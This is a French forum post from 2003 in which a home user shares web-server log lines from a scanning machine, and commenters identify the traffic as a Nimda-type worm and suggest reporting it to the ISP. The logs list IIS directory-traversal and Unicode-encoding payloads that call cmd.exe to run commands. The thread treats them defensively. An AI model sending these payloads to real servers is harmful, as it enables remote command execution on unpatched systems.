Journal Jamais à l'abri

Posté par  .
Étiquettes : aucune
0
18
déc.
2003
Je pensai que ma meilleur protection était mon rtc poussif,changeant et cher qui rend ma présence sur réseau insignifiante. Et voila-t-y pas qu'en essayant tail (que je ne connaissai pas) sur pourquoi pas le log httpd ( j'en ai installé un petit pour m'éviter de gérer les droits des photos de famille ) , je tombe sur ça :
62.143.129.16 - - [17/Dec/2003:21:39:37 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:39 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:40 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:44 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:45 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:48 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:49 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:53 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:54 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:39:55 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:40:00 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:40:01 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:40:03 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:40:04 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:40:04 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
62.143.129.16 - - [17/Dec/2003:21:40:05 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

C'est drôle parceque ma machine est défenestrée mais tout de meme c'est pas des façons !
Par ailleurs si quelqu'un(e) a une idée de ce à quoi ce la correspond, je serai curieux de le savoir moi aussi.

  • # Re: Jamais à l'abri

    Posté par  . Évalué à 1.

    C'est très probablement un vers de type nimda qui essaye de se reproduire sur ton ordi. Ton rtc ne te protège pas beaucoup, nimda teste des plages entières d'IP. Sur mon adsl, j'ai une dizaine de requête de ce type par jour.

  • # Re: Jamais à l'abri

    Posté par  (site web personnel) . Évalué à 2.

    c'est juste des jeunes delinquants feroces qui scannent des plages entieres d'ip a la recherche de machine hebergeant un serveur http et essaient leurs exploits prevu pour certains serveurs d'un certain systeme d'exploitation sur toutes les machines qu'ils trouvent. en gros, c'est pas trop dangeureux pour un serveur sous linux.

    • [^] # Re: Jamais à l'abri

      Posté par  (site web personnel) . Évalué à 1.

      Non !!! Dans ce cas c'est pire... C'est un mec qui à une machine infectée et non patchée contre (apparement) Nimda ou l'un de ses dérivés...

      Ceci est juste un bel exemple que l'informatique c'est un truc d'informaticien et que Luce et Henri ne sont pas prêts de pouvoir utiliser un ordinateur sans avoir de soucis...

      Ce qui est inquiétant c'est de retrouver ce genre de traces dans des logs alors que ce vers devrait avoir disparu depuis bien longtemps. A mon avis, il n'est pas prêt d'être éradiqué celui-la :).

      • [^] # Re: Jamais à l'abri

        Posté par  (site web personnel, Mastodon) . Évalué à 1.

        en parlant de ça, un petit coup de iptables + ULOG + ulogd donne des choses intéressantes sur ma machine (adsl avec aucun ports ouverts vers l'extérieur) et bien au bout de 24 h, près de 8000 tentatives connexions, parmi celles là bcp de port 135 et autres kazaa/emule......

        est ce un effet de bord de l'informatique pour le grand public ?

        M.

      • [^] # Re: Jamais à l'abri

        Posté par  (site web personnel) . Évalué à 1.

        > Ce qui est inquiétant c'est de retrouver ce genre de traces dans des logs alors que ce vers devrait avoir disparu depuis bien longtemps. A mon avis, il n'est pas prêt d'être éradiqué celui-la :).

        Disparu ? Houla non, il a énormément diminué, mais je reçois encore une centaine d'attaques par mois sur ma machine allumée 15h par jour.

  • # Re: Jamais à l'abri

    Posté par  . Évalué à 1.

    t'aurais pu proteger l'ip

    • [^] # Re: Jamais à l'abri

      Posté par  . Évalué à 2.

      pourquoi donc ?
      J'ai pris ça pour une agression volontaire, je n'avais aucune raison de laisser mon *agresseur* anonyme.
      Par contre, étant établi que la volonté du possesseur de l'adresse ne semble pas engagée, il serait juste convenable de l'informer du probléme ( seulement j'imagine que retrouver l'ordi par une adresse ip qui a toute les chances d'avoir été alloué dynamiquement est un peu lourd ).

      • [^] # Re: Jamais à l'abri

        Posté par  (site web personnel, Mastodon) . Évalué à 3.

        si tu fais un whois dessus, tu remarqueras que son fournisseur d'accès est ISH (ish.de) et que tu peux utiliser abuse@ish.de...

        alors si tu parles allemand, tu peux les contacter pour qu'il demande à )a personne qui détient la machine qui t'a "attaquer" de se patcher/munir d'un antivirus/changer de système/etc .........

        M.

  • # Re: Jamais à l'abri

    Posté par  (site web personnel) . Évalué à 1.

    faut *toujours* sortir couvert...

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.